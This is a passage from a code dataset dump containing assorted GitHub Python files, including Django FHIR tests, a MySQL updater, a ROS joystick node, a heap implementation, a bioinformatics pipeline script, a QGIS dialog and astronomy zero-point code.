args_version_from_job\n\n\nmain()\n","repo_name":"pkollias/GatingInWorkingMemory","sub_path":"dpca_assemble.py","file_name":"dpca_assemble.py","file_ext":"py","file_size_in_byte":6487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19824430344","text":"from django.test import TestCase\n\nfrom rest_fhir.models import Resource\n\n\nclass ResourceTestCase(TestCase):\n def test_create_resource(self):\n resource_content = {\n 'resourceType': 'Patient',\n 'name': [\n {\n 'use': 'official',\n 'family': 'Donald',\n 'given': [\n 'Duck',\n ],\n }\n ],\n }\n\n resource = Resource()\n resource.save(resource_content=resource_content)\n\n resource_content_with_id = dict(\n id=str(resource.id),\n **resource_content,\n )\n\n self.assertEqual(resource.resource_type, 'Patient')\n self.assertEqual(resource.version_id, 1)\n self.assertEqual(resource.version.version_id, resource.version_id)\n self.assertEqual(\n resource.version.resource_content, resource_content_with_id\n )\n self.assertEqual(resource.published_at, resource.version.published_at)\n self.assertEqual(resource.updated_at, resource.version.published_at)\n\n self.assertEqual(resource.history.count(), 1)\n self.assertEqual(resource.version, resource.history.first())\n\n def test_update_resource(self):\n # Creating the resource\n resource_content = {\n 'resourceType': 'Organization',\n 'name': 'XYZ Insurance',\n 'alias': [\n 'ABS Insurance',\n ],\n }\n resource = Resource()\n resource.save(resource_content=resource_content)\n first_version_obj = resource.version\n\n # Updating the resource\n resource_content_updated = {\n 'resourceType': 'Organization',\n 'name': 'ACME Healthcare',\n 'alias': [\n 'ACME',\n 'ACME Clinical Lab',\n ],\n }\n resource_content_updated_with_id = dict(\n id=str(resource.id),\n **resource_content_updated,\n )\n resource.save(resource_content=resource_content_updated)\n last_version_obj = resource.version\n\n self.assertIsNotNone(resource.version_id, 2)\n self.assertEqual(\n last_version_obj.resource_content, resource_content_updated_with_id\n )\n self.assertEqual(resource.published_at, first_version_obj.published_at)\n self.assertEqual(resource.updated_at, last_version_obj.published_at)\n self.assertEqual(resource.history.count(), 2)\n self.assertEqual(first_version_obj, resource.history.first())\n self.assertEqual(last_version_obj, resource.history.last())\n\n def test_delete_resource(self):\n resource_content = {\n 'resourceType': 'Location',\n 'name': 'South Wing, second floor',\n 'description': 'Second floor of the Old South Wing, formerly in use by Psychiatry',\n }\n\n resource = Resource()\n resource.save(resource_content=resource_content)\n version = resource.version\n\n num_objs_deleted, per_obj_deleted = resource.delete()\n\n self.assertEqual(num_objs_deleted, 2)\n self.assertEqual(\n per_obj_deleted,\n {\n 'rest_fhir.Resource': 1,\n 'rest_fhir.ResourceVersion': 1,\n },\n )\n\n self.assertIsNotNone(resource.deleted_at)\n self.assertEqual(resource.history.count(), 2)\n\n [first_version, deleted_version] = resource.history.all()\n\n self.assertEqual(version, first_version)\n self.assertIsNotNone(deleted_version.deleted_at)\n self.assertIsNone(deleted_version.resource_content)\n self.assertIsNotNone(resource.deleted_at, deleted_version.deleted_at)\n","repo_name":"weynelucas/django-rest-fhir","sub_path":"tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":3745,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"8762208844","text":"import shutil\nfrom pathlib import Path\n\nfrom tqdm import tqdm\n\nfrom AccessSql import SQL\nfrom Env import Env as env\n\n\nclass UpdateDB:\n def __init__(self, log, out_dir):\n self.log = log\n self.mysql = SQL(env.USER, env.PWD, env.HOST, env.DB)\n self.out_dir = Path(out_dir) if isinstance(out_dir, str) else out_dir\n\n def update_db(self, title_df, chpt_df, page_df, _type=\"image\"):\n for i, entry in tqdm(title_df.iterrows(), total=title_df.shape[0], desc=\"Updating Database\"):\n self.log.debug(f\"Updating SQL entry for Title: {entry['title']}\")\n self._update_lib(entry)\n\n c_df = chpt_df.loc[chpt_df['item_id'] == entry['item_id']]\n list_of_c_ids = c_df['chpt_id'].tolist()\n self._update_chapt(c_df)\n\n if _type == \"image\":\n p_df = page_df.loc[page_df['chpt_id'].isin(list_of_c_ids)]\n self._update_pages(p_df)\n self._copy_files(c_df, p_df, entry['cover_path'])\n else:\n self.log.warning(\"Not implemented for Video Yet.\")\n\n def _copy_files(self, c_df, p_df, cover_path):\n for chapter in c_df.itertuples():\n page_dir = self.out_dir / str(chapter.item_id) / str(chapter.chpt_id)\n page_dir.mkdir(parents=True, exist_ok=True)\n\n pages = p_df.loc[p_df['chpt_id'] == chapter.chpt_id].copy()\n for page in pages.itertuples():\n shutil.copy(page.src_path, page_dir / Path(page.page_path).name)\n\n shutil.copy(cover_path, self.out_dir / str(c_df.iloc[0]['item_id']) / f'cover{Path(cover_path).suffix}')\n\n def _update_pages(self, page_df):\n q_str = f\"\"\"\n INSERT INTO Pages(PageId, Path, ChptId, ImgType)\n VALUES\n \"\"\"\n val_str = []\n for i, entry in page_df.iterrows():\n val_str.append(f\"({entry['page_id']}, '{entry['page_path']}', {entry['chpt_id']}, '{entry['img_type']}')\")\n\n val_str = \",\".join(val_str)\n q_str = q_str + val_str\n self.mysql.query(q_str)\n self.mysql.set_update()\n\n def _update_chapt(self, chpt_df):\n q_str = f\"\"\"\n INSERT INTO Chapters(ChptId, ChapterNo, TotalPages, DateCreated, ItemId, ChapterTitle)\n VALUES\n \"\"\"\n val_str = []\n for i, entry in chpt_df.iterrows():\n val_str.append(f\"({entry['chpt_id']}, {entry['chpt_no']}, {entry['total_pages']}, \"\n f\"'{entry['date_created']}', {entry['item_id']}, '{entry['chpt_title']}')\")\n\n val_str = \",\".join(val_str)\n q_str = q_str + val_str\n self.mysql.query(q_str)\n self.mysql.set_update()\n\n def _update_lib(self, entry):\n assert entry['cover_path'] is not None, f\"Cover Path is None for Entry: {entry['title']}\"\n q_str = f\"\"\"\n INSERT INTO Library_Items(ItemId, Title, Maker, ItemType, DateCreated, CoverPath, TotalEntries)\n VALUES\n ({entry['item_id']}, '{entry['title']}', '{entry['maker']}', '{entry['item_type']}', '{entry['date_created']}', \n 'comic/{entry['item_id']}/cover{entry['cover_path'].suffix}', {entry['total_entries']})\n \"\"\" if not entry['item_exist'] else f\"\"\"\n UPDATE Library_Items\n SET DateCreated='{entry['date_created']}', TotalEntries={entry['total_entries']}\n WHERE ItemId={entry['item_id']}\n \"\"\"\n self.mysql.query(q_str)\n self.mysql.set_update()\n","repo_name":"SKJTCodes/updateComic","sub_path":"UpdateDB.py","file_name":"UpdateDB.py","file_ext":"py","file_size_in_byte":3440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74402477031","text":"#!/usr/bin/env python\nimport rospy\nfrom geometry_msgs.msg import Twist\nfrom sensor_msgs.msg import Joy\n\n # Author: Bogdan Catangiu\n # This ROS Node converts Joystick inputs from the joy node\n # into commands for bookshelf_robot\ndef callback(data):\n twist = Twist()\n if data.buttons[4] == 1: #slow movement\n twist.linear.x = 0.1*data.axes[1]\n twist.angular.z = -0.1*data.axes[0]\n else: # fast movement\n twist.linear.x = 2*data.axes[1]\n twist.angular.z = -2*data.axes[0]\n pub.publish(twist)\n\n # Intializes everything\ndef start():\n # publishing to \"/cmd_vel\" to control bookshelf_robot base\n global pub\n rospy.init_node('joy_to_twist')\n pub = rospy.Publisher('cmd_vel', Twist, queue_size = 10)\n # subscribed to joystick inputs on topic \"joy\"\n rospy.Subscriber(\"joy\", Joy, callback)\n # starts the node\n rospy.spin()\n\nif __name__ == '__main__':\n start()\n \n","repo_name":"BogdanCATANGIU/Knock_Robot","sub_path":"src/joy_to_twist.py","file_name":"joy_to_twist.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21387734609","text":"# Bài 5. Viết chương trình yêu cầu người sử dụng nhập\n# vào các số nguyên từ bàn phím cho đến khi nhập số 0\n# thì kết thúc. Tính tổng các số chẵn và tổng các số lẻ\n# đã được nhập.\n\ndef main():\n n = int(input('Nhap vao so nguyen, nhap 0 de ket thuc: '))\n odd_sum = 0\n even_sum = 0\n while n != 0:\n if n % 2 == 0:\n even_sum += n\n else:\n odd_sum += n\n n = int(input())\n print(f'Tong cac so chan: {even_sum}')\n print(f'Tong cac so le: {odd_sum}')\n\nmain()\n\n","repo_name":"tiendat01/source-subject-hust","sub_path":"Python-learn-IT3150-ProjectI/ly-thuyet-TinDC-byPython/chuong4/bt-loop/bt5.py","file_name":"bt5.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"vi","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"11190272693","text":"# 최대 100개의 정수가 키로 입력될 때\n\n# 1. 최대힙 구현\n\ndef enq(n):\n global last\n last += 1\n tree[last] = n # 완전이진트리 유지\n\n # 최대힙으로 맞춰주기\n child = last\n parent = child // 2 # 완전이진트리의 부모 정점번호\n while tree[parent] < tree[child] and parent >= 1: # 자식 키값 더 큰 경우\n tree[parent], tree[child] = tree[child], tree[parent] # 위치바꾸기\n child = parent\n parent = child // 2\n\ndef deq(): # 삭제\n global last\n tmp = tree[1]\n tree[1] = tree[last]\n last -= 1\n #--------삭제 후, 자리 바꾸기 끝\n # ------- 최대힙 유지를 위해 부모>자식 여부 파악 후 교환\n parent = 1\n left_child = parent * 2 # 왼쪽 자식\n cur_child = left_child # cur_child는 현재 왼쪽자식\n right_child = left_child + 1\n while cur_child <= last: # 비교할 자식이 있다면\n # 오른쪽 자식도 있고, 오른쪽 자식이 왼쪽 자식보다 더 크다면\n if right_child <= last and tree[left_child] < tree[right_child]:\n cur_child = right_child # right child 와 parent 비교\n\n if tree[parent] < tree[cur_child]: # 자식 키 값이 더 크면 교환\n tree[parent], tree[cur_child] = tree[cur_child], tree[parent]\n # parent 바꾸기\n parent = cur_child\n cur_child = parent*2\n else:\n break\n return tmp\n\n\n\n\n\n# 완전이진트리 정점 1 ~ 100\nV = 100\ntree = [0]*(V+1)\n\n# 마지막 정점 번호 관리\nlast = 0\n\nenq(3)\nenq(2)\nenq(4)\nenq(7)\nenq(5)\nenq(1)\n# print(tree[1])\nenq(9)\n# print(tree[1])\nwhile last > 0:\n print(deq(), tree[1])\n","repo_name":"jisy2718/_algorithm","sub_path":"정리할것들/0316_tree연습/heap.py","file_name":"heap.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34660019758","text":"import pytest\nfrom selenium.webdriver.common.by import By\nimport time\n\nlink = \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/\"\n\n\ncases = [\n (\"es\", \"Añadir al carrito\",),\n (\"fr\", \"Ajouter au panier\",),\n (\"ru\", \"Добавить в корзину\",),\n (\"en\", \"Add to basket\",),\n]\n\nids = [x[0] for x in cases]\n\n@pytest.mark.parametrize(\"language, want\", cases,ids=ids)\ndef test_basket_btn(browser,user_language,language,want):\n if language != user_language:\n pytest.skip(f\"skip {language} language\")\n \n browser.get(link)\n browser.implicitly_wait(10)\n \n btn = browser.find_element(By.XPATH,\"//*[@class='btn btn-lg btn-primary btn-add-to-basket']\")\n got = btn.text\n assert want == got, f\"want '{want}, got '{got}'\"\n time.sleep(5)\n","repo_name":"Arizzzzzona/test_items_hw","sub_path":"test_items.py","file_name":"test_items.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35084657864","text":"#!/usr/bin/env python3\n\"\"\"Unit tests for utils.access_nested_map and utils.get_json\"\"\"\nimport unittest\nfrom parameterized import parameterized\nfrom unittest.mock import patch, Mock\nfrom utils import access_nested_map, get_json, memoize\n\n\nclass TestAccessNestedMap(unittest.TestCase):\n \"\"\"Test class for access_nested_map function\"\"\"\n\n @parameterized.expand([\n ({\"a\": 1}, (\"a\",), 1),\n ({\"a\": {\"b\": 2}}, (\"a\",), {\"b\": 2}),\n ({\"a\": {\"b\": 2}}, (\"a\", \"b\"), 2)\n ])\n def test_access_nested_map(self, nested_map, path, expected_result):\n \"\"\"Test access_nested_map function\"\"\"\n self.assertEqual(access_nested_map(nested_map, path), expected_result)\n\n @parameterized.expand([\n ({}, (\"a\",), KeyError),\n ({\"a\": 1}, (\"a\", \"b\"), KeyError)\n ])\n def test_access_nested_map_exception(\n self, nested_map, path, expected_exception\n ):\n \"\"\"Test access_nested_map function for KeyError\"\"\"\n with self.assertRaises(expected_exception) as context:\n access_nested_map(nested_map, path)\n self.assertIsInstance(context.exception, expected_exception)\n\n\nclass TestGetJson(unittest.TestCase):\n \"\"\"Test class for get_json function\"\"\"\n\n @parameterized.expand([\n (\"http://example.com\", {\"payload\": True}),\n (\"http://holberton.io\", {\"payload\": False})\n ])\n @patch('utils.requests.get')\n def test_get_json(self, test_url, test_payload, mock_get):\n \"\"\"Test get_json function\"\"\"\n # Configure the Mock object to return test_payload when json()\n mock_get.return_value = Mock()\n mock_get.return_value.json.return_value = test_payload\n\n # Call the get_json function with the test URL\n result = get_json(test_url)\n\n # Assert that the mocked requests.get method was called exactly\n mock_get.assert_called_once_with(test_url)\n\n # Assert that the output of get_json is equal to the expected\n self.assertEqual(result, test_payload)\n\n\nclass TestClass:\n def a_method(self):\n return 42\n\n _a_property = None\n\n @property\n def a_property(self):\n if self._a_property is None:\n self._a_property = self.a_method()\n return self._a_property\n\n\nclass TestMemoize(unittest.TestCase):\n \"\"\"Test class for memoize decorator\"\"\"\n\n @patch.object(TestClass, 'a_method')\n def test_memoize(self, mock_a_method):\n \"\"\"Test the memoize decorator\"\"\"\n # Configure the mock_a_method to return a specific value\n mock_a_method.return_value = 42\n\n # Create an instance of TestClass\n instance = TestClass()\n\n # Call the a_property method twice\n result1 = instance.a_property\n result2 = instance.a_property\n\n # Assert that the mock_a_method was called exactly once\n mock_a_method.assert_called_once()\n\n # Assert that the results of both calls are the same\n self.assertEqual(result1, 42)\n self.assertEqual(result2, 42)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"lamech-byte/alx-backend-python","sub_path":"0x03-Unittests_and_integration_tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":3042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9670344690","text":"import pysam\nimport argparse\nimport os.path\nimport time\nimport pandas as pd\nimport sys\nimport argparse\nimport subprocess\nimport importlib\nfrom functools import reduce\nfrom SRAClass import SRA\nfrom GBKClass import GBK\nfrom ProjectClass import Project\n\n\nfrom Bio import SeqIO\n\n\n\ndef parser():\n\tparser = argparse.ArgumentParser()\n\t### Args for processing an accession file\n\tparser.add_argument(\"-p\",'--process', help=\"Option to process data\", dest = \"process\")\n\tparser.add_argument(\"-a\",'--accession', help=\"SRA accession file\", dest = \"accession\")\n\tparser.add_argument(\"-n\",'--name', help=\"SRA accession file descriptive name\", dest = \"name\")\n\tparser.add_argument(\"-g\",'--gbk', help=\"GBK file\", dest = \"gbk\")\n\t### Args for creating a project out of specific accession files\n\tparser.add_argument(\"-u\",'--project', help = \"Option to make a new project (provide name of project here too)\",dest = \"projectname\")\n\tparser.add_argument(\"-q\",'--quick', nargs='+', help = \"Use this option if you are directly providing fcount references, and list the descriptive names of those references\",dest=\"FCountnames\")\n\tparser.add_argument(\"-l\",'--list', nargs='+', help=\" Provide list of descriptive names of accessions or fcount references\",dest=\"list\")\n\tparser.add_argument(\"-k\", '--kegg', help = \"Provide kegg reference file here\", dest = \"kegg\")\n\t## Args for only getting specific things\n\tparser.add_argument(\"-t\", '--get', help = \"Specifies what you want to get. Current Options: GBK amino acid fasta (gbk_fa), GBK nucleotide fasta (gbk_na)\", dest = \"get\")\n\tparser.add_argument(\"-i\", '--input', help = \"Provide input here\", dest = \"input\")\n\targs = parser.parse_args()\n\n\n\treturn(args)\n\n\ndef CacheData(SRA,GBK):\n\tif not os.path.exists(\"/home/kz/Pipeline/cache.txt\"):\n\t\twith open('cache.txt', 'w') as f:\n\t\t\torganization = { \"SRA\" : {}, \"GBK\" : {}}\n\t\t\tSRAObject = SRA.OrganizeData()\n\t\t\tGBKObject = GBK.OrganizeData()\n\t\t\torganization[\"SRA\"].update({SRA.DescriptiveName : {} })\n\t\t\torganization[\"GBK\"].update({GBK.LocusTag : {} })\n\t\t\torganization[\"SRA\"][SRA.DescriptiveName].update(SRAObject)\n\t\t\torganization[\"GBK\"][GBK.LocusTag].update(GBKObject)\n\t\t\tprint(organization,file=f)\n\telse:\n\t\twith open('cache.txt', 'r+') as f:\n\t\t\tcontent = f.read();\n\t\t\torganization = eval(content)\n\t\t\tSRAObject = SRA.OrganizeData()\n\t\t\tGBKObject = GBK.OrganizeData()\n\t\t\torganization[\"SRA\"].update({SRA.DescriptiveName : {} })\n\t\t\torganization[\"GBK\"].update({GBK.LocusTag : {} })\n\t\t\torganization[\"SRA\"][SRA.DescriptiveName].update(SRAObject)\n\t\t\torganization[\"GBK\"][GBK.LocusTag].update(GBKObject)\n\t\t\tf.truncate(0)\n\t\t\tprint(organization,file=f)\t\t\n \t\t\n\ndef main(args):\n\n\tif hasattr(args,'process') and args.process is not None:\n\n\t\tInputSRA = SRA(args.name, args.accession)\n\t\tprint(\"SRA is downloaded\")\n\t\tInputGBK = GBK(args.gbk)\n\t\tprint(\"GBK is read\")\n\t\tInputGBK.MakeSAF()\n\t\tInputGBK.MakeNa(\"MIDDLE\")\n\t\tInputGBK.MakeFa(\"MIDDLE\")\n\t\tprint(\"GBK SAF is made\")\n\t\tInputSRA.TrimAccession()\n\t\tprint(\"SRA is trimmed\")\n\t\tInputSRA.BuildIndex(InputGBK)\n\t\tprint(\"Index is built\")\n\t\tInputSRA.bowtie2_align(InputGBK)\n\t\tprint(\"SRA Outputs retrieved\")\n\t\tInputSRA.FeatureCounts(InputGBK)\n\t\tprint(\"Featurecounts finished\")\n\t\tCacheData(InputSRA,InputGBK)\n\n\telif hasattr(args,'projectname') and args.projectname is not None:\n\t\tif not hasattr(args, 'FCountnames'):\n\t\t\twith open('cache.txt', 'r+') as f:\n\t\t\t\tcontent = f.read();\n\t\t\t\torganization = eval(content)\n\t\t\tSRATable = {}\n\t\t\tfor i in range(0,len(args.list)):\n\t\t\t\tSRATable[i] = (SRA(organization[\"SRA\"][args.list[i]]))\n\t\t\tNewProject = Project(args.projectname,SRATable, \"SRA\")\n\t\telse:\n\t\t\tfcounts = {}\n\t\t\tfor i in range(0,len(args.list)):\n\t\t\t\tfcounts[args.FCountnames[i]] = args.list[i]\n\t\t\tNewProject = Project(args.projectname,fcounts, \"Fcount\",args.kegg)\n\t\tNewProject.MakeFCountDataFrame()\n\t\tNewProject.NormalizeReads()\n\t\tNewProject.CalculateTE()\n\t\tNewProject.MergeWithKegg()\n\telif hasattr(args,'get') and args.get is not None:\n\t\tInputGBK = GBK(args.input)\n\t\tif args.get == \"gbk_fa\":\n\t\t\tInputGBK.MakeFa(\"OUTPUT\")\n\t\telif args.get == \"gbk_na\":\n\t\t\tInputGBK.MakeNa(\"OUTPUT\")\n\t\telse:\n\t\t\tprint(\"No \\\"get\\\" option was selected\")\n\t\t\n\telse:\n\t\tprint(\"No option was selected\")\n\n\n\t\n\n\nif __name__ == \"__main__\":\n args = parser()\n main(args)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"ehaddad05/Pipeline","sub_path":"program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":4253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31538433559","text":"# 5_B.py The Maximum Number of Overlaps\n# AC 0.72s 64720KB\n\nMAXPOS = 1000\n\ndef solve(n, rects):\n coords = [[0] * (MAXPOS + 1) for _ in range(MAXPOS + 1)]\n for x1, y1, x2, y2 in rects:\n coords[y1][x1] += 1\n coords[y1][x2] -= 1\n coords[y2][x1] -= 1\n coords[y2][x2] += 1\n\n for y in range(MAXPOS):\n for x in range(1, MAXPOS + 1):\n coords[y][x] += coords[y][x - 1]\n\n for y in range(1, MAXPOS + 1):\n for x in range(MAXPOS):\n coords[y][x] += coords[y - 1][x]\n\n return max(max(xs) for xs in coords)\n\nfrom sys import stdin\n\nn = int(stdin.readline())\nrects = [[int(e) for e in line.split()] for line in stdin.readlines()]\n\nprint(solve(n, rects))\n\n","repo_name":"koba925/alds","sub_path":"aoj/DSL/5_B.py","file_name":"5_B.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6466425656","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nModule implementing MarkerDialog.\n\"\"\"\n\nfrom PyQt4.QtGui import *\nfrom PyQt4.QtCore import *\n\nfrom qgis.core import *\nfrom qgis.gui import *\nfrom qgis.utils import *\n\nfrom magicMarkers import MagicMarkers\nfrom colours import colourManager\n\nfrom Ui_marker_dialog import Ui_Dialog\n\n\nclass MarkerDialog(QDialog, Ui_Dialog):\n \"\"\"\n Class documentation goes here.\n \"\"\"\n def __init__(self, attribute, tableView, parent = None):\n \"\"\"\n Constructor\n \"\"\"\n QDialog.__init__(self, parent)\n self.setupUi(self)\n self.svgDict = None\n self.scene = None\n self.attribute = attribute\n self.tableView = tableView\n self.svgDict, self.scene = MagicMarkers().viewSVGs(self.SVGView)\n \n @pyqtSignature(\"\")\n def on_buttonBox_accepted(self):\n \"\"\"\n Slot documentation goes here.\n \"\"\"\n if self.svgDict != None:\n MagicMarkers().setSVG(\"tourist_attraction\", self.attribute , self.scene, self.svgDict)\n attractions = QgsMapLayerRegistry.instance().mapLayersByName(\"tourist_attraction\")[0]\n colourManager().makeClassTable(attractions, \"LEGEND\", self.tableView)\n\n self.close()\n \n @pyqtSignature(\"\")\n def on_buttonBox_rejected(self):\n \"\"\"\n Slot documentation goes here.\n \"\"\"\n self.close()\n \n @pyqtSignature(\"QString\")\n def on_comboBox_activated(self, p0):\n \"\"\"\n Slot documentation goes here.\n \"\"\"\n self.svgDict, self.scene = MagicMarkers().viewSVGs(self.SVGView)\n","repo_name":"Charlotteg/QGISforSchools","sub_path":"marker_dialog.py","file_name":"marker_dialog.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"73953504871","text":"# Usei dicionario, sem nem saber oq era :I\ncores = {'red': '\\033[31m',\n 'clean': '\\033[m',\n 'green': '\\033[32m'}\n\nvalor = float(input('digite o valor do imovel: R$ '))\nsalario = float(input('digite o salario do comprador: R$ '))\nparcela = int(input('em quantas parcelas(anuais) será dividido: '))\nprestacao = (valor / parcela) / 12\nlimite = (salario * 30) / 100\nprint(f'Para ser pago em {parcela} anos, esse imovel com valor de {valor} R$'\n f' será cobrado em prestações de {prestacao:.2f} R$ por mês.')\nif prestacao >= limite:\n print(f'Emprestimo {cores[\"red\"]}NEGADO!')\nelse:\n print(f'{cores[\"green\"]}Emprestimo aceito!{cores[\"clean\"]}\\nParabens pelo seu novo imóvel ')\n","repo_name":"Acosmosss/Curso_em_Video_Python","sub_path":"Exercicios/Minhas Soluções(Comentado)/Mundo 2/Desafio 036.py","file_name":"Desafio 036.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21003954998","text":"\"\"\"\nCalculate the zero points of the i-band and z-band\n\"\"\"\n\nimport os\nfrom typing import Tuple\nimport numpy as np\nimport pylab as plt\nfrom scipy.optimize import curve_fit\nimport pandas as pd\nfrom astropy.stats import sigma_clipped_stats\n\nfrom sex_catalog import SExtractorCat\nfrom k_constant import calculate_k_constant_mag\nimport plotting\n\n\ndef remove_outliers(array, sigma):\n \"\"\"returns a mask of values within the given sigma.\"\"\"\n median, std = np.median(array), np.std(array)\n good_idx = np.where((array >= median-sigma*std) & (array <= median + sigma*std))[0]\n return good_idx\n\ndef read_in_wide_band(sextractor_file_name: str, panstars_cat_name: str):\n \"\"\"Reading in the catalogs.\"\"\"\n decam_catalog = SExtractorCat(sextractor_file_name)\n decam_catalog, pan_cat = decam_catalog.cross_match_with_panstars(panstars_cat_name)\n return decam_catalog, pan_cat\n\ndef get_broad_band_mags(decam_df: pd.DataFrame, panstars_cat: pd.DataFrame, band: str) -> Tuple:\n \"\"\"Gets the magnitudes and errors for a wide-band filter.\"\"\"\n\n dec_mags = decam_df['MAG_APER'].values\n dec_mags_uncertainty = decam_df['MAGERR_APER'].values\n pan_mags = panstars_cat[f'{band}MeanPSFMag'].values\n pan_mags_uncertainty = panstars_cat[f'{band}MeanPSFMagErr'].values\n\n converted_mags, converted_mags_errors = CONVERT[band](panstars_cat)\n\n return dec_mags, dec_mags_uncertainty, converted_mags,\\\n converted_mags_errors, pan_mags, pan_mags_uncertainty\n\n\ndef convert_panstars_i_dec_mags(panstars_cat: pd.DataFrame):\n \"\"\"Converts the panstars magnitudes into decam magnitudes.\n see: https://des.ncsa.illinois.edu/releases/dr2/dr2-docs/dr2-transformations\"\"\"\n r_panstars_mags = panstars_cat['rMeanPSFMag'].values\n i_panstars_mags = panstars_cat['iMeanPSFMag'].values\n i_uncertainties = panstars_cat['iMeanPSFMagErr'].values\n r_uncertainties = panstars_cat['rMeanPSFMagErr'].values\n\n i_decam = i_panstars_mags - 0.155 * (r_panstars_mags - i_panstars_mags) + 0.015\n converted_i_uncertainties = np.hypot(\n i_uncertainties, 0.155*np.hypot(i_uncertainties, r_uncertainties))\n\n return i_decam, converted_i_uncertainties\n\n\ndef convert_panstars_z_dec_mags(panstars_cat: pd.DataFrame):\n \"\"\"Converts the panstars magnitudes into decam magnitudes.\n see: https://des.ncsa.illinois.edu/releases/dr2/dr2-docs/dr2-transformations\"\"\"\n r_panstars_mags = panstars_cat['rMeanPSFMag'].values\n i_panstars_mags = panstars_cat['iMeanPSFMag'].values\n z_panstars_mags = panstars_cat['zMeanPSFMag'].values\n i_uncertainties = panstars_cat['iMeanPSFMagErr'].values\n r_uncertainties = panstars_cat['rMeanPSFMagErr'].values\n z_uncertainties = panstars_cat['zMeanPSFMagErr'].values\n\n z_decam = z_panstars_mags - 0.114 * (r_panstars_mags - i_panstars_mags) - 0.010\n converted_z_uncertainties = np.hypot(\n z_uncertainties, 0.114*np.hypot(i_uncertainties, r_uncertainties))\n\n return z_decam, converted_z_uncertainties\n\n\nCONVERT = {\n 'i': convert_panstars_i_dec_mags,\n 'z': convert_panstars_z_dec_mags,\n}\n\ndef prepare_plotting_data(sextractor_file_name, panstars_file_name, band):\n \"\"\"Gets all the necessary variables for plotting ready and removes outliers.\"\"\"\n decam_catalog, panstars_catalog = read_in_wide_band(sextractor_file_name, panstars_file_name)\n mags = get_broad_band_mags(decam_catalog, panstars_catalog, band=band)\n msk = remove_outliers(mags[-2], sigma=2)\n cleaned_mags = [mag[msk] for mag in mags]\n return cleaned_mags\n\n\ndef straight_line(x_array, intercept):\n \"\"\"y=mx +c with m=1. Line for fitting to the zpt plot.\"\"\"\n return x_array + intercept\n\nclass BroadBand:\n \"\"\"\n Broad Band class for sorting the different magnitudes\n and determine the zpt.\n \"\"\"\n def __init__(self, panstars_cat_name: str, sextractor_cat_name: str, broadband: str):\n if broadband not in 'iz':\n raise ValueError('broadband needs to be either \"i\" or \"z\".')\n self.broadband = broadband\n self.sextractor_cat_name = sextractor_cat_name\n mags = prepare_plotting_data(sextractor_cat_name, panstars_cat_name, broadband)\n diffs = mags[2] - mags[0]\n diff_cut = np.where((diffs>30) & (diffs <32))[0] # specifically for this research.\n good_values = np.where(mags[2] < 100)[0] # Obviously not physical if this isn't met.\n other_good_values = np.where(mags[0] < -6)[0] # specific for decam\n more_good_values = np.where(mags[3] < 100)[0] # not physical to have errors more than 100 mags\n good_values = np.intersect1d(good_values, other_good_values)\n good_values = np.intersect1d(good_values, more_good_values)\n good_values = np.intersect1d(good_values, diff_cut)\n self.measured_mags = mags[0][good_values]\n self.measured_mags_err = mags[1][good_values]\n self.expected_mags = mags[2][good_values]\n self.expected_mags_err = mags[3][good_values]\n\n def plot_zpt(self):\n \"\"\"Plots the measured mags vs the expected mags.\"\"\"\n plotting.start_plot('DECam magnitudes [mag]', 'Expected magnitudes - DECam magnitudes [mags]')\n y_err = np.hypot(self.measured_mags_err, self.expected_mags_err)\n plt.errorbar(\n self.measured_mags, self.expected_mags - self.measured_mags,\n xerr=self.measured_mags_err, yerr=y_err,\n fmt='ko', alpha=0.3, ms=2.5, elinewidth=1.5)\n x_fit, fit, fit_up, fit_down = self.fit_horizontal_line()\n plt.plot(x_fit, fit, ls='--', color='r', lw=3, zorder=1)\n plt.fill_between(x_fit, fit_up, fit_down, alpha=.5, color='r')\n plotting.end_plot(f'plots/{self.broadband}_zpt.png')\n plt.show()\n\n def fit_straight_line(self) -> Tuple:\n \"\"\"Fitting y=x+c line to the data to determine c\"\"\"\n zpt, zpt_err = self.zero_point\n nstd = 5.\n popt_up = zpt + nstd * zpt_err\n popt_dw = zpt - nstd * zpt_err\n x_fit = np.linspace(np.sort(self.measured_mags)[0], np.sort(self.measured_mags)[-1])\n fit = straight_line(x_fit, zpt)\n fit_up = straight_line(x_fit, popt_up)\n fit_dw= straight_line(x_fit, popt_dw)\n return x_fit, fit, fit_up, fit_dw\n\n def fit_horizontal_line(self) ->Tuple:\n \"\"\"Fitting y = c line.\"\"\"\n zpt, zpt_err = self.zero_point[0], self.zero_point[1]\n nstd = 5.\n popt_up = zpt + nstd * zpt_err\n popt_dw = zpt - nstd * zpt_err\n x_fit = np.linspace(np.sort(self.measured_mags)[0], np.sort(self.measured_mags)[-1])\n fit = zpt * np.ones(len(x_fit))\n fit_up = popt_up * 